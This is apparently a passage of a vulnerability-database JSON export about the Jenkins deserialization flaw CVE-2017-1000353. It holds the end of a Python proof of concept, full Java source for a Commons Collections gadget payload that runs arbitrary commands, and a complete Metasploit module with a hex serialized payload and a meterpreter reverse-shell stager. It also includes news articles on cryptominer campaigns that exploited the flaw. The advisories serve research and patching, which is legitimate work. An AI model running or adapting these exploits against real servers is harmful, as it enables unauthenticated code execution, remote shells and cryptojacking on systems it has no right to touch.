proxies=proxies)\r\n\r\n\r\ndef null_payload():\r\n yield \" \"\r\n\r\ndef create_payload():\r\n payload = PREAMLE + PROTO + FILE_SER\r\n\r\n return payload\r\n\r\ndef create_payload_chunked():\r\n yield PREAMLE\r\n yield PROTO\r\n yield FILE_SER\r\n\r\ndef main():\r\n print \"start\"\r\n\r\n session = str(uuid.uuid4())\r\n\r\n t = threading.Thread(target=download, args=(URL, session))\r\n t.start()\r\n\r\n time.sleep(1)\r\n print \"pwn\"\r\n #upload(URL, session, create_payload())\r\n\r\n upload_chunked(URL, session, \"asdf\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n```\r\n\r\n**payload.jar**\r\n\r\n```\r\nimport java.io.FileOutputStream;\r\nimport java.io.ObjectOutputStream;\r\nimport java.io.ObjectStreamException;\r\nimport java.io.Serializable;\r\nimport java.lang.reflect.Field;\r\nimport java.security.KeyPair;\r\nimport java.security.KeyPairGenerator;\r\nimport java.security.PrivateKey;\r\nimport java.security.PublicKey;\r\nimport java.security.Signature;\r\nimport java.security.SignedObject;\r\nimport java.util.Comparator;\r\nimport java.util.HashMap;\r\nimport java.util.HashSet;\r\nimport java.util.Map;\r\nimport java.util.concurrent.ConcurrentSkipListSet;\r\nimport java.util.concurrent.CopyOnWriteArraySet;\r\n\r\nimport net.sf.json.JSONArray;\r\n\r\nimport org.apache.commons.collections.Transformer;\r\nimport org.apache.commons.collections.collection.AbstractCollectionDecorator;\r\nimport org.apache.commons.collections.functors.ChainedTransformer;\r\nimport org.apache.commons.collections.functors.ConstantTransformer;\r\nimport org.apache.commons.collections.functors.InvokerTransformer;\r\nimport org.apache.commons.collections.keyvalue.TiedMapEntry;\r\nimport org.apache.commons.collections.map.LazyMap;\r\nimport org.apache.commons.collections.map.ReferenceMap;\r\nimport org.apache.commons.collections.set.ListOrderedSet;\r\n\r\npublic class Payload implements Serializable {\r\n\r\n private Serializable payload;\r\n\r\n public Payload(String cmd) throws Exception {\r\n\r\n this.payload = this.setup(cmd);\r\n\r\n }\r\n\r\n public Serializable setup(String cmd) throws Exception {\r\n final String[] execArgs = new String[] { cmd };\r\n\r\n final Transformer[] transformers = new Transformer[] {\r\n new ConstantTransformer(Runtime.class),\r\n new InvokerTransformer(\"getMethod\", new Class[] { String.class,\r\n Class[].class }, new Object[] { \"getRuntime\",\r\n new Class[0] }),\r\n new InvokerTransformer(\"invoke\", new Class[] { Object.class,\r\n Object[].class }, new Object[] { null, new Object[0] }),\r\n new InvokerTransformer(\"exec\", new Class[] { String.class },\r\n execArgs), new ConstantTransformer(1) };\r\n\r\n Transformer transformerChain = new ChainedTransformer(transformers);\r\n\r\n final Map innerMap = new HashMap();\r\n\r\n final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);\r\n\r\n TiedMapEntry entry = new TiedMapEntry(lazyMap, \"foo\");\r\n\r\n HashSet map = new HashSet(1);\r\n map.add(\"foo\");\r\n Field f = null;\r\n try {\r\n f = HashSet.class.getDeclaredField(\"map\");\r\n } catch (NoSuchFieldException e) {\r\n f = HashSet.class.getDeclaredField(\"backingMap\");\r\n }\r\n\r\n f.setAccessible(true);\r\n HashMap innimpl = (HashMap) f.get(map);\r\n\r\n Field f2 = null;\r\n try {\r\n f2 = HashMap.class.getDeclaredField(\"table\");\r\n } catch (NoSuchFieldException e) {\r\n f2 = HashMap.class.getDeclaredField(\"elementData\");\r\n }\r\n\r\n f2.setAccessible(true);\r\n Object[] array2 = (Object[]) f2.get(innimpl);\r\n\r\n Object node = array2[0];\r\n if (node == null) {\r\n node = array2[1];\r\n }\r\n\r\n Field keyField = null;\r\n try {\r\n keyField = node.getClass().getDeclaredField(\"key\");\r\n } catch (Exception e) {\r\n keyField = Class.forName(\"java.util.MapEntry\").getDeclaredField(\r\n \"key\");\r\n }\r\n\r\n keyField.setAccessible(true);\r\n keyField.set(node, entry);\r\n\r\n KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(\"DSA\");\r\n keyPairGenerator.initialize(1024);\r\n KeyPair keyPair = keyPairGenerator.genKeyPair();\r\n PrivateKey privateKey = keyPair.getPrivate();\r\n PublicKey publicKey = keyPair.getPublic();\r\n\r\n Signature signature = Signature.getInstance(privateKey.getAlgorithm());\r\n SignedObject payload = new SignedObject(map, privateKey, signature);\r\n JSONArray array = new JSONArray();\r\n\r\n array.add(\"asdf\");\r\n\r\n ListOrderedSet set = new ListOrderedSet();\r\n Field f1 = AbstractCollectionDecorator.class\r\n .getDeclaredField(\"collection\");\r\n f1.setAccessible(true);\r\n f1.set(set, array);\r\n\r\n DummyComperator comp = new DummyComperator();\r\n ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp);\r\n csls.add(payload);\r\n\r\n CopyOnWriteArraySet a1 = new CopyOnWriteArraySet();\r\n CopyOnWriteArraySet a2 = new CopyOnWriteArraySet();\r\n\r\n a1.add(set);\r\n Container c = new Container(csls);\r\n a1.add(c);\r\n\r\n a2.add(csls);\r\n a2.add(set);\r\n\r\n ReferenceMap flat3map = new ReferenceMap();\r\n flat3map.put(new Container(a1), \"asdf\");\r\n flat3map.put(new Container(a2), \"asdf\");\r\n\r\n return flat3map;\r\n }\r\n\r\n private Object writeReplace() throws ObjectStreamException {\r\n return this.payload;\r\n }\r\n\r\n static class Container implements Serializable {\r\n\r\n private Object o;\r\n\r\n public Container(Object o) {\r\n this.o = o;\r\n }\r\n\r\n private Object writeReplace() throws ObjectStreamException {\r\n return o;\r\n }\r\n\r\n }\r\n\r\n static class DummyComperator implements Comparator, Serializable {\r\n\r\n public int compare(Object arg0, Object arg1) {\r\n // TODO Auto-generated method stub\r\n return 0;\r\n }\r\n\r\n private Object writeReplace() throws ObjectStreamException {\r\n return null;\r\n }\r\n\r\n }\r\n\r\n public static void main(String args[]) throws Exception{\r\n\r\n if(args.length != 2){\r\n System.out.println(\"java -jar payload.jar outfile cmd\");\r\n System.exit(0);\r\n }\r\n\r\n String cmd = args[1];\r\n FileOutputStream out = new FileOutputStream(args[0]);\r\n\r\n Payload pwn = new Payload(cmd);\r\n ObjectOutputStream oos = new ObjectOutputStream(out);\r\n oos.writeObject(pwn);\r\n oos.flush();\r\n out.flush();\r\n\r\n\r\n }\r\n\r\n}\r\n```\r\n\r\n\r\n#### **\u7f16\u8005\u6ce8**\r\n\u76ee\u524d\u56fd\u5185\u5b89\u5168\u793e\u533a\u5df2\u7ecf\u63d0\u4f9b\u4e86\u8be5\u6f0f\u6d1e\u7684\u68c0\u6d4b\u63d2\u4ef6(\u5de1\u98ce https://github.com/ysrc/xunfeng/ ) ,\u548c\u57fa\u4e8e `Docker` \u7684\u6f0f\u6d1e\u6d4b\u8bd5\u73af\u5883\r\n* https://github.com/Medicean/VulApps\r\n* https://github.com/phith0n/vulhub", "published": "2017-04-28T00:00:00", "type": "seebug", "title": "Jenkins Java Deserialization Remote Code Execution Vulnerability (CVE-2017-1000353)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000353"], "modified": "2017-04-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93062", "id": "SSV:93062", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:57:52", "description": "Jenkins uses the XStream library to serialize and deserialize XML. Its maintainer [recently published a security vulnerability](http://www.openwall.com/lists/oss-security/2017/04/03/4) that allows anyone able to provide XML to Jenkins for processing using XStream to crash the Java process. In Jenkins this typically applies to users with permission to create or configure items (jobs), views, or agents.\r\n\r\nJenkins now prohibits the attempted deserialization of void / Void that results in a crash.", "published": "2017-04-28T00:00:00", "type": "seebug", "title": "Jenkins XStream: Java crash when trying to instantiate void/Void (CVE-2017-1000355)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000355"], "modified": "2017-04-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93065", "id": "SSV:93065", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2017-05-05T18:47:52", "description": "CloudBees Jenkins 2.32.1 - Java Deserialization. CVE-2017-1000353. Dos exploit for Java platform. Tags: Denial of Service (DoS)", "published": "2017-05-05T00:00:00", "type": "exploitdb", "title": "CloudBees Jenkins 2.32.1 - Java Deserialization", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000353"], "modified": "2017-05-05T00:00:00", "id": "EDB-ID:41965", "href": "https://www.exploit-db.com/exploits/41965/", "sourceData": "Source: https://blogs.securiteam.com/index.php/archives/3171\r\n\r\nVulnerability Details\r\n\r\nJenkins is vulnerable to a Java deserialization vulnerability. In order to trigger the vulnerability two requests need to be sent.\r\n\r\nThe vulnerability can be found in the implementation of a bidirectional communication channel (over HTTP) which accepts commands.\r\n\r\nThe first request starts a session for the bi-directional channel and is used for \u201cdownloading\u201d data from the server. The HTTP header \u201cSession\u201d is the identifier for the channel. The HTTP header \u201cSide\u201d specifies the \u201cdownloading/uploading\u201d direction.\r\n\r\nThe second request is the sending component of the bidirectional channel. The first requests is blocked until the second request is sent. The request for a bidirectional channel is matched by the \u201cSession\u201d HTTP header which is just a UUID.\r\n\r\n\r\nProof of Concept\r\n\r\nIn order to exploit the vulnerability, an attacker needs to create a serialized payload with the command to execute by running the payload.jar script.\r\n\r\nThe second step is to change python script jenkins_poc1.py:\r\n- Adjust target url in URL variable\r\n- Change file to open in line \u201cFILE_SER = open(\u201cjenkins_poc1.ser\u201d, \u201crb\u201d).read()\u201d to your payload file.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41965.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/41965/"}], "threatpost": [{"lastseen": "2019-04-25T05:49:50", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000353"], "description": "Hackers behind cryptominer attacks are growing more aggressive and ruthless. Case and point, a cryptominer malware sample dubbed WinstarNssmMiner has been tracked in 500,000 attacks in the past three days, earning the crooks $28,000, according to researchers.\n\nWhat makes the cryptominer so vicious is the fact that, post infection, if a victim\u2019s AV software identifies WinstarNssmMiner and tries to remove it (or a user tries to disable it) the malware crashes the host system. WinstarNssmMiner targets Windows systems and leeches on to a system\u2019s processor power with a trojanized version of the XMRig mining program.\n\n\u201cThis malware is very hard to remove since victims\u2019 computers crash as soon as [it\u2019s] found,\u201d according to 360 Security researchers who published a [report on the malware Wednesday](<https://blog.360totalsecurity.com/en/cryptominer-winstarnssmminer-made-fortune-brutally-hijacking-computer/>). \u201cWe\u2019re quite surprised to see a cryptominer being so brutal to hijack victims\u2019 computers by adopting techniques of stubborn malware,\u201d researchers wrote.\n\nAn analysis of the cryptominer campaign reveals WinstarNssmMiner has already earned cybercriminals 133 Monero, or $28,000 based on current rates. Researchers did not specify how long it took criminals to earn that money.\n\nThose totals are a drop in the bucket for crypto-jacking campaigns. Malicious cryptomining that targets computers, servers or cloud-based systems have seen enormous growth over the last six months earning crooks millions in cryptocurrency. In February, hackers are estimated to have earned $3 million by exploiting a vulnerability ([CVE-2017-1000353](<https://jenkins.io/security/advisory/2017-04-26/>)) on servers running Jenkins software and installing Monero miners, researchers at [Check Point reported](<https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/>).\n\nIt\u2019s unclear what the WinstarNssmMiner infection path is, but once the malware executes on a targeted system it launches a system process called svchost.exe, a process that manages system services. Next, it injects malicious code into svchost.exe.\n\n\u201cThere are actually two svchost.exe processes created. One performs the mining tasks. The other runs in the background for sensing the antivirus protection and avoiding detection,\u201d researchers said.\n\nThe svchost.exe process created for cryptomining has a process attribute of CriticalProcess, which means terminating the process crashes the system. A second svchost.exe process runs in the background and attempts to detect \u201cdecent\u201d antivirus software that developers know can identify the malware. \u201c[The] malware will quit automatically to avoid direct confrontation,\u201d researchers said.\n\nThe miner itself is based on the open source project, XMRig. XMRig is a legitimate cryptocurrency mining program known as a high performance Monero CPU miner. The miner is better known for its trojanized versions that have been adopted for criminal use. It has been used [in several recent malicious cryptocurrency campaigns](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) and one in January where it was installed via malware on [15 to 30 million endpoints](<https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-cryptocurrency-mining-operation-using-xmrig/>), according to a report by Palo Alto Networks.\n\nXMRig code was also used in recent attacks, such as the Jenkins miner, and also with malicious campaigns dubbed RubyMiner and WaterMiner, according to [an IBM X-Force Research report](<https://securityintelligence.com/xmrig-father-zeus-of-cryptocurrency-mining-malware/>).\n", "modified": "2018-05-16T19:56:09", "published": "2018-05-16T19:56:09", "id": "THREATPOST:BE009076F7BB03DF3F38AEAC53E3DE88", "href": "https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/", "type": "threatpost", "title": "New Cryptominer Distributes XMRig in Aggressive Attacks", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-07-03T05:58:59", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "modified": "2018-09-05T17:48:03", "published": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-09-22T18:47:02", "description": "", "published": "2020-09-22T00:00:00", "type": "packetstorm", "title": "Jenkins 2.56 CLI Deserialization / Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000353"], "modified": "2020-09-22T00:00:00", "id": "PACKETSTORM:159266", "href": "https://packetstormsecurity.com/files/159266/Jenkins-2.56-CLI-Deserialization-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \nprepend Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Jenkins CLI Deserialization', \n'Description' => %q{ \nAn unauthenticated Java object deserialization vulnerability exists \nin the CLI component for Jenkins versions `v2.56` and below. \n \nThe `readFrom` method within the `Command` class in the Jenkins \nCLI remoting component deserializes objects received from clients without \nfirst checking / sanitizing the data. Because of this, a malicious serialized \nobject contained within a serialized `SignedObject` can be sent to the Jenkins \nendpoint to achieve code execution on the target. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'SSD', # PoC \n'Unknown', # Vulnerability discovery \n'Shelby Pace' # Metasploit module \n], \n'References' => \n[ \n[ 'URL', 'https://www.jenkins.io/security/advisory/2017-04-26/'], \n[ 'URL', 'https://ssd-disclosure.com/ssd-advisory-cloudbees-jenkins-unauthenticated-code-execution/'], \n[ 'CVE', '2017-1000353'] \n], \n'Privileged' => false, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Targets' => \n[ \n[ \n'Linux', \n{ \n'Platform' => 'linux', \n'CmdStagerFlavor' => [ 'wget', 'curl' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' } \n} \n] \n], \n'DisclosureDate' => '2017-04-26', \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE ], \n'Reliability' => [ UNRELIABLE_SESSION ], \n'SideEffects' => [ IOC_IN_LOGS ] \n}, \n'DefaultTarget' => 0 \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The base path to Jenkins', '/' ]) \n] \n) \nend \n \ndef check \nlogin_uri = normalize_uri(target_uri.path, 'login') \nlogin_res = send_request_cgi( \n'method' => 'GET', \n'uri' => login_uri \n) \n \nreturn Exploit::CheckCode::Unknown('Did not receive a response from the server') unless login_res \n \n/Jenkins\\s+ver\\.\\s+(?<version>\\d+(?:\\.\\d+)*)/ =~ login_res.body \nreturn Exploit::CheckCode::Safe('Version of Jenkins cannot be found.') unless version \n \nvers_no = Gem::Version.new(version) \nreturn Exploit::CheckCode::Appears(\"Jenkins version #{version} detected\") if vers_no < Gem::Version.new('2.54') \n \nExploit::CheckCode::Detected \nend \n \ndef exploit \nprint_status('Sending payload...') \nexecute_cmdstager(noconcat: true) \nend \n \ndef format_payload(payload_data) \nformatted_payload = '74' \nformatted_payload << payload_data.length.to_s(16).rjust(4, '0') \nformatted_payload << payload_data.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join \nend \n \ndef execute_command(cmd, _opts = {}) \nsess_uuid = SecureRandom.uuid \nsess_uri = normalize_uri(target_uri.path, 'cli') \npreamble = '<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=' \n \nsend_request_cgi( \n{ \n'uri' => sess_uri, \n'method' => 'POST', \n'headers' => \n{ \n'Side' => 'download', \n'Session' => sess_uuid \n} \n}, \nnil, false \n) # don't wait for response, and don't disconnect \n \ncmd = build_obj(cmd) \nsend_request_cgi( \n{ \n'uri' => sess_uri, \n'method' => 'POST', \n'data' => preamble + [ cmd ].pack('H*'), \n'headers' => \n{ \n'Side' => 'upload', \n'Session' => sess_uuid \n} \n} \n) \nsleep(2) # give buffer time between requests for processing \nend \n \ndef build_obj(obj_data) \npayload_data = '00000000aced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61' \npayload_data << '701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742' \npayload_data << 'e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e6375727265' \npayload_data << '6e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e5' \npayload_data << '77269746541727261794c697374785d9fd546ab90c303000078707704000000027372002a6a6176612e7574696c2e636f6e63757272656e742e' \npayload_data << '436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e637572726' \npayload_data << '56e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63' \npayload_data << '757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6' \npayload_data << 'd70617261746f723b7870707372001a6a6176612e73656375726974792e5369676e65644f626a65637409ffbd682a3cd5ff0200035b0007636f' \npayload_data << '6e74656e747400025b425b00097369676e617475726571007e000e4c000c746865616c676f726974686d7400124c6a6176612f6c616e672f537' \npayload_data << '472696e673b7870757200025b42acf317f8060854e002000078700000050daced0005737200116a6176612e7574696c2e48617368536574ba44' \npayload_data << '859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6' \npayload_data << 'e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a' \npayload_data << '6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e7' \npayload_data << '32e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61706163' \npayload_data << '68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6' \npayload_data << 'e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d6954' \npayload_data << '72616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d657' \npayload_data << '23b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d8' \npayload_data << '3418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436' \npayload_data << 'f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c' \npayload_data << '616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e7' \npayload_data << '32e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f' \npayload_data << '6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d547' \npayload_data << '97065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c' \npayload_data << '02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a9902000078700' \npayload_data << '00000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078' \npayload_data << '707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106' \npayload_data << 'a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013' \npayload_data << '75720013' \npayload_data << '5b4c6a6176612e6c616e672e537472696e673b' \npayload_data << 'add256e7e91d7b47' \npayload_data << '020000' \npayload_data << '7870' \npayload_data << '00000001' \n \nobj_data = format_payload(obj_data) \npayload_data << obj_data \n \npayload_data << '740004' \npayload_data << '65786563' # exec \npayload_data << '7571007e0' \npayload_data << '01b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c756578' \npayload_data << '7200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700' \npayload_data << '507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878' \npayload_data << '787571007e00110000002f302d02147ed1e347cfebac075517d658628ac128211d8895021500945aaa3b69fb24194cdf22bcee9fc9c5e317266' \n \n# This index is the length of the serialized \n# object that belongs to the SignedObject \nstart_arr = payload_data.index('050daced') \nend_arr = payload_data.index('787571007e') \nnew_arr_len = ((end_arr + 2) / 2) - ((start_arr + 4) / 2) \npayload_data[start_arr, 4] = new_arr_len.to_s(16).rjust(4, '0') \n \npayload_data << '0740003445341737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017078737200316f72' \npayload_data << '672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced5302000' \npayload_data << '14c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c' \npayload_data << '656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b03000078707' \npayload_data << '37200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c' \npayload_data << '656d656e747371007e0018787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136' \npayload_data << 'a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65787000000001770400000001740004617364667878' \npayload_data << '7371007e001e00000000770400000000787871007e00207371007e00027371007e000577040000000271007e001a71007e00097871007e00207078' \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/159266/jenkins_cli_deserialization.rb.txt"}], "metasploit": [{"lastseen": "2020-10-14T08:30:04", "description": "An unauthenticated Java object deserialization vulnerability exists in the CLI component for Jenkins versions `v2.56` and below. The `readFrom` method within the `Command` class in the Jenkins CLI remoting component deserializes objects received from clients without first checking / sanitizing the data. Because of this, a malicious serialized object contained within a serialized `SignedObject` can be sent to the Jenkins endpoint to achieve code execution on the target.\n", "published": "2020-09-02T18:37:41", "type": "metasploit", "title": "Jenkins CLI Deserialization", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000353"], "modified": "2020-09-17T18:25:14", "id": "MSF:EXPLOIT/LINUX/HTTP/JENKINS_CLI_DESERIALIZATION", "href": "", "sourceData": "##\n# This module requires Metasploit: 